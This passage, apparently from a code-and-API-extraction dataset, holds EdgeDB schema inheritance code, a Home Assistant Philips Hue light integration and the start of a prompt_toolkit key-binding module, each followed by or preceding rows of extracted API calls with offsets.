schema, context, astnode, [self.scls])
ref_create.if_not_exists = True
ref_create.set_attribute_value(refdict.backref_attr, child)
if child.get_is_derived(schema):
# All references in a derived object must
# also be marked as derived, to be consistent
# with derive_subtype().
ref_create.set_attribute_value('is_derived', True)
ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True)
ref_alter.add(ref_rebase_cmd(
classname=fq_name,
implicit=True,
added_bases=(),
removed_bases=(),
))
alter.add(ref_alter)
alter.add(ref_create)
self.add(alter)
return schema
def get_implicit_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
bases: Any,
) -> Sequence[str]:
mcls = self.get_schema_metaclass()
default_base = mcls.get_default_base_name()
if isinstance(bases, so.ObjectCollectionShell):
base_names = [
b.name for b in bases.items if b.name is not None
]
else:
assert isinstance(bases, so.ObjectList)
base_names = list(bases.names(schema))
# Filter out explicit bases
implicit_bases = [
b
for b in base_names
if (
b != default_base
and isinstance(b, sn.SchemaName)
and sn.shortname_from_fullname(b) != b
)
]
return implicit_bases
class AlterReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.AlterInheritingObject[ReferencedInheritingObjectT],
):
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
refctx = cls.get_referrer_context(context)
if refctx is not None:
cmd.set_attribute_value('is_local', True)
assert isinstance(cmd, AlterReferencedInheritingObject)
return cmd
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
scls = self.scls
was_local = scls.get_is_local(schema)
schema = super()._alter_begin(schema, context)
now_local = scls.get_is_local(schema)
if not was_local and now_local:
self._validate(schema, context)
return schema
class RebaseReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.RebaseInheritingObject[ReferencedInheritingObjectT],
):
implicit = struct.Field(bool, default=False)
def apply(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.implicit:
mcls = self.get_schema_metaclass()
refctx = self.get_referrer_context_or_die(context)
referrer = refctx.scls
assert isinstance(referrer, so.InheritingObject)
refdict = type(referrer).get_refdict_for_class(mcls)
implicit_bases = self._get_implicit_ref_bases(
schema,
context,
referrer=referrer,
referrer_field=refdict.attr,
fq_name=self.classname,
)
scls = self.get_object(schema, context)
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema,
context,
scls,
implicit_bases=implicit_bases,
)
self.added_bases = added_bases
self.removed_bases = removed_bases
return super().apply(schema, context)
class RenameReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
sd.RenameObject,
):
def _rename_begin(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> s_schema.Schema:
orig_schema = schema
schema = super()._rename_begin(schema, context)
scls = self.scls
if not context.canonical and not scls.generic(schema):
implicit_bases = scls.get_implicit_bases(schema)
non_renamed_bases = set(implicit_bases) - context.renamed_objs
# This object is inherited from one or more ancestors that
# are not renamed in the same op, and this is an error.
if non_renamed_bases:
bases_str = ', '.join(
b.get_verbosename(schema, with_parent=True)
for b in non_renamed_bases
)
verb = 'are' if len(non_renamed_bases) > 1 else 'is'
vn = scls.get_verbosename(orig_schema)
raise errors.SchemaDefinitionError(
f'cannot rename inherited {vn}',
details=(
f'{vn} is inherited from '
f'{bases_str}, which {verb} not being renamed'
),
context=self.source_context,
)
if context.enable_recursion:
schema = self._propagate_ref_rename(schema, context, scls)
else:
for op in self.get_subcommands(type=sd.ObjectCommand):
schema = op.apply(schema, context)
return schema
def _propagate_ref_rename(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject
) -> s_schema.Schema:
rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.RenameObject, type(scls))
def _ref_rename(alter_cmd: sd.Command,
refname: str) -> None:
astnode = rename_cmdcls.astnode(
new_name=qlast.ObjectRef(
name=refname,
),
)
rename_cmd = rename_cmdcls._rename_cmd_from_ast(
schema, astnode, context)
alter_cmd.add(rename_cmd)
return self._propagate_ref_op(schema, context, scls, cb=_ref_rename)
class DeleteReferencedInheritingObject(
DeleteReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.DeleteInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
self_name = self.scls.get_name(schema)
schema = referrer.del_classref(schema, refdict.attr, refname)
if (isinstance(referrer, so.InheritingObject)
and not context.canonical):
if (not context.in_deletion(offset=1)
and not context.disable_dep_verification):
implicit_bases = set(self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self_name))
deleted_bases = set()
for ctx in context.stack:
if isinstance(ctx.op, type(self)):
deleted_bases.add(ctx.op.scls)
implicit_bases -= deleted_bases
if implicit_bases:
# Cannot remove inherited objects.
vn = scls.get_verbosename(schema, with_parent=True)
parents = [
b.get_field_value(schema, refdict.backref_attr)
for b in implicit_bases
]
pnames = '\n- '.join(
p.get_verbosename(schema, with_parent=True)
for p in parents
)
raise errors.SchemaError(
f'cannot drop inherited {vn}',
context=self.source_context,
details=f'{vn} is inherited from:\n- {pnames}'
)
alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
for child in referrer.children(schema):
assert isinstance(child, so.QualifiedObject)
child_coll = child.get_field_value(schema, refdict.attr)
fq_refname_in_child = self._classname_from_name(
self_name,
child.get_name(schema),
)
child_refname = reftype.get_key_for_name(
schema, fq_refname_in_child)
existing = child_coll.get(schema, child_refname, None)
if existing is not None:
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
schema, cmd = self._propagate_ref_deletion(
schema, context, refdict, child, existing)
alter.add(cmd)
self.add(alter)
return schema
def _propagate_ref_deletion(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
child: so.InheritingObject,
child_ref: ReferencedInheritingObjectT,
) -> Tuple[s_schema.Schema, sd.Command]:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
name = child_ref.get_name(schema)
implicit_bases = self._get_implicit_ref_bases(
schema, context, child, refdict.attr, name)
cmd: sd.Command
if child_ref.get_is_local(schema) or implicit_bases:
# Child is either defined locally or is inherited
# from another parent, so we need to do a rebase.
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema, context, child_ref, implicit_bases)
rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls)
rebase_cmd = rebase_cmd_cls(
classname=name,
added_bases=added_bases,
removed_bases=removed_bases,
)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
cmd = ref_alter_cmd(classname=name)
cmd.add(rebase_cmd)
else:
# The ref in child should no longer exist.
ref_del_cmd = get_cmd(sd.DeleteObject, mcls)
cmd = ref_del_cmd(classname=name)
schema = cmd.apply(schema, context)
return schema, cmd
| [
"edb.common.struct.Field",
"hashlib.sha1",
"edb.edgeql.ast.ObjectRef",
"edb.errors.SchemaDefinitionError",
"edb.errors.SchemaError"
] | [((34717, 34750), 'edb.common.struct.Field', 'struct.Field', (['bool'], {'default': '(False)'}), '(bool, default=False)\n', (34729, 34750), False, 'from edb.common import struct\n'), ((12110, 12124), 'hashlib.sha1', 'hashlib.sha1', ([], {}), '()\n', (12122, 12124), False, 'import hashlib\n'), ((3477, 3550), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot derive {self!r}({derived_name}) from itself"""'], {}), "(f'cannot derive {self!r}({derived_name}) from itself')\n", (3495, 3550), False, 'from edb import errors\n'), ((36944, 37122), 'edb.errors.SchemaDefinitionError', 'errors.SchemaDefinitionError', (['f"""cannot rename inherited {vn}"""'], {'details': 'f"""{vn} is inherited from {bases_str}, which {verb} not being renamed"""', 'context': 'self.source_context'}), "(f'cannot rename inherited {vn}', details=\n f'{vn} is inherited from {bases_str}, which {verb} not being renamed',\n context=self.source_context)\n", (36972, 37122), False, 'from edb import errors\n'), ((38084, 38113), 'edb.edgeql.ast.ObjectRef', 'qlast.ObjectRef', ([], {'name': 'refname'}), '(name=refname)\n', (38099, 38113), True, 'from edb.edgeql import ast as qlast\n'), ((40315, 40449), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot drop inherited {vn}"""'], {'context': 'self.source_context', 'details': 'f"""{vn} is inherited from:\n- {pnames}"""'}), '(f\'cannot drop inherited {vn}\', context=self.\n source_context, details=f"""{vn} is inherited from:\n- {pnames}""")\n', (40333, 40449), False, 'from edb import errors\n')] |
"""Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
# We filter out '0' too, which can be incorrectly reported by 3rd party buls
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_ewelink and not self.is_livarno:
command["alert"] = "none"
if ATTR_EFFECT in kwargs:
effect = kwargs[ATTR_EFFECT]
if effect == EFFECT_COLORLOOP:
command["effect"] = "colorloop"
elif effect == EFFECT_RANDOM:
command["hue"] = random.randrange(0, 65535)
command["sat"] = random.randrange(150, 254)
else:
command["effect"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Turn the specified or all lights off."""
command = {"on": False}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_livarno:
command["alert"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
if not self.is_group:
return {}
return {ATTR_IS_HUE_GROUP: self.is_group}
| [
"logging.getLogger",
"homeassistant.helpers.debounce.Debouncer",
"random.randrange",
"homeassistant.helpers.entity.DeviceInfo",
"async_timeout.timeout",
"homeassistant.util.color.color_xy_to_hs",
"functools.partial",
"homeassistant.helpers.update_coordinator.UpdateFailed",
"datetime.timedelta",
"homeassistant.util.color.check_valid_gamut",
"homeassistant.util.color.color_hs_to_xy"
] | [((1183, 1203), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(5)'}), '(seconds=5)\n', (1192, 1203), False, 'from datetime import timedelta\n'), ((1215, 1242), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1232, 1242), False, 'import logging\n'), ((6930, 7002), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (6937, 7002), False, 'from functools import partial\n'), ((14302, 14615), 'homeassistant.helpers.entity.DeviceInfo', 'DeviceInfo', ([], {'identifiers': '{(HUE_DOMAIN, self.device_id)}', 'manufacturer': 'self.light.manufacturername', 'model': '(self.light.productname or self.light.modelid)', 'name': 'self.name', 'suggested_area': 'suggested_area', 'sw_version': "self.light.raw['swversion']", 'via_device': '(HUE_DOMAIN, self.bridge.api.config.bridgeid)'}), "(identifiers={(HUE_DOMAIN, self.device_id)}, manufacturer=self.\n light.manufacturername, model=self.light.productname or self.light.\n modelid, name=self.name, suggested_area=suggested_area, sw_version=self\n .light.raw['swversion'], via_device=(HUE_DOMAIN, self.bridge.api.config\n .bridgeid))\n", (14312, 14615), False, 'from homeassistant.helpers.entity import DeviceInfo\n'), ((3717, 3776), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.lights.update'], {}), '(async_safe_fetch, bridge, bridge.api.lights.update)\n', (3724, 3776), False, 'from functools import partial\n'), ((3851, 3930), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (3860, 3930), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((4414, 4486), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (4421, 4486), False, 'from functools import partial\n'), ((4866, 4925), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.groups.update'], {}), '(async_safe_fetch, bridge, bridge.api.groups.update)\n', (4873, 4925), False, 'from functools import partial\n'), ((5000, 5079), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (5009, 5079), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((5307, 5377), 'functools.partial', 'partial', (['create_light', 'HueLight', 'group_coordinator', 'bridge', '(True)', 'None'], {}), '(create_light, HueLight, group_coordinator, bridge, True, None)\n', (5314, 5377), False, 'from functools import partial\n'), ((7376, 7400), 'async_timeout.timeout', 'async_timeout.timeout', (['(4)'], {}), '(4)\n', (7397, 7400), False, 'import async_timeout\n'), ((7569, 7597), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['"""Unauthorized"""'], {}), "('Unauthorized')\n", (7581, 7597), False, 'from homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((7663, 7696), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['f"""Hue error: {err}"""'], {}), "(f'Hue error: {err}')\n", (7675, 7696), False, 'from homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((11705, 11752), 'homeassistant.util.color.color_xy_to_hs', 'color.color_xy_to_hs', (["*source['xy']", 'self.gamut'], {}), "(*source['xy'], self.gamut)\n", (11725, 11752), False, 'from homeassistant.util import color\n'), ((15843, 15899), 'homeassistant.util.color.color_hs_to_xy', 'color.color_hs_to_xy', (['*kwargs[ATTR_HS_COLOR]', 'self.gamut'], {}), '(*kwargs[ATTR_HS_COLOR], self.gamut)\n', (15863, 15899), False, 'from homeassistant.util import color\n'), ((10131, 10166), 'homeassistant.util.color.check_valid_gamut', 'color.check_valid_gamut', (['self.gamut'], {}), '(self.gamut)\n', (10154, 10166), False, 'from homeassistant.util import color\n'), ((16825, 16851), 'random.randrange', 'random.randrange', (['(0)', '(65535)'], {}), '(0, 65535)\n', (16841, 16851), False, 'import random\n'), ((16885, 16911), 'random.randrange', 'random.randrange', (['(150)', '(254)'], {}), '(150, 254)\n', (16901, 16911), False, 'import random\n'), ((17066, 17107), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17073, 17107), False, 'from functools import partial\n'), ((17202, 17242), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (17209, 17242), False, 'from functools import partial\n'), ((17992, 18033), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17999, 18033), False, 'from functools import partial\n'), ((18128, 18168), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (18135, 18168), False, 'from functools import partial\n')] |
from prompt_toolkit.key_binding.bindings.named_commands import (accept_line,
self_insert, backward_delete_char, beginning_of_line)
from prompt_toolkit.key_binding.bindings.basic import if_no_repeat
from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings
from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings
from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings
from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings
from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings
from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings
from prompt_toolkit.keys import Keys, ALL_KEYS
from prompt_toolkit.filters import Condition, HasSelection, is_searching
from prompt_toolkit.selection import SelectionState
from prompt_toolkit.clipboard import ClipboardData
from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES
from prompt_toolkit.application.current import get_app
from prompt_toolkit.application import run_in_terminal
from prompt_toolkit import __version__ as prompt_toolkit_version
from .multiline import (auto_newline, tab_should_insert_whitespace,
document_is_multiline_python)
from .tokenize import inside_string, matching_parens
from .theme import emoji, emoji_pudb
from .processors import get_pyflakes_warnings
import re
import subprocess
import sys
import textwrap
import platform
def get_key_bindings():
# Based on prompt_toolkit.key_binding.defaults.load_key_bindings()
return merge_key_bindings([
load_basic_bindings(),
load_emacs_bindings(),
load_emacs_search_bindings(),
load_emacs_page_navigation_bindings(),
load_mouse_bindings(),
load_cpr_bindings(),
custom_key_bindings,
])
r = custom_key_bindings = KeyBindings()
def warning_positions(event):
document = event.current_buffer.document
warnings = get_pyflakes_warnings(document.text, frozenset(event.current_buffer.session._locals))
positions = []
for (row, col, msg, m) in warnings:
# Handle SyntaxErrorMessage which is the same warning for the whole
# line.
if m.col != col:
continue
pos = document.translate_row_col_to_index(row, col)
positions.append(pos)
return positions
